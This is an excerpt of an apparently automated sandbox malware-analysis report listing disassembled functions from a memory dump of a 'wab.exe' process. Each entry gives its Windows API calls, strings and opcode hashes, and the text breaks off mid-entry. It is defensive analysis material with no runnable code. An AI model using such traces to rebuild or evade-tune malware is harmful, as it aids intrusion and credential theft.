                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 1156039329-0
                                                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                              • String ID:
                                                                                              • API String ID: 1631957507-0
                                                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1125800050-0
                                                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: d
                                                                                              • API String ID: 0-2564639436
                                                                                              • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                              • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: BINARY
                                                                                              • API String ID: 2221118986-907554435
                                                                                              • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                              • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1161345128-0
                                                                                              • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                              • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmp
                                                                                              • String ID: /stext
                                                                                              • API String ID: 2081463915-3817206916
                                                                                              • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                              • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                              • String ID:
                                                                                              • API String ID: 159017214-0
                                                                                              • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                              • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 3150196962-0
                                                                                              • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                              • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: malloc
                                                                                              • String ID: failed to allocate %u bytes of memory
                                                                                              • API String ID: 2803490479-1168259600
                                                                                              • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                              • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                              • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                              • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmpmemset
                                                                                              • String ID:
                                                                                              • API String ID: 1065087418-0
                                                                                              • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                              • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID:
                                                                                              • API String ID: 2221118986-0
                                                                                              • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                              • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                              • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                              • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                              • String ID:
                                                                                              • API String ID: 1481295809-0
                                                                                              • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                              • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 3150196962-0
                                                                                              • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                              • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$PointerRead
                                                                                              • String ID:
                                                                                              • API String ID: 3154509469-0
                                                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                              • String ID:
                                                                                              • API String ID: 4232544981-0
                                                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$FileModuleName
                                                                                              • String ID:
                                                                                              • API String ID: 3859505661-0
                                                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                              Memory Dump Source
